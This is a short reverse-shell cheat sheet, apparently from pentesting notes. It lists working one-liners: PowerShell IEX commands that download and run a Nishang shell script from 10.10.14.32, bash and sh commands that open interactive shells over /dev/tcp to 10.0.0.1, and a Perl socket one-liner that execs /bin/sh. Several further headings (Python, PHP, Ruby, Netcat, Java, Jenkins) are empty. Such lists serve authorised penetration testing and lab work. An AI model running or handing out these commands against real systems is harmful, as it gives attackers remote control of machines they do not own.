Reverse shell

Powershell

// Edit and host nishang Invoke-PowershellTcp
Powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/shell.ps1)

// using powershell.exe os bit architecture
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/shell.ps1)

Bash/Shell

# bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

# /bin/bash
/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

# sh
sh -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

Python

PHP

Ruby

Netcat / Netcat without -e

Java

JENKINS Script Console

Jenkins > Manage Jenkins > script console

Nishang Powershell

Last updated

Was this helpful?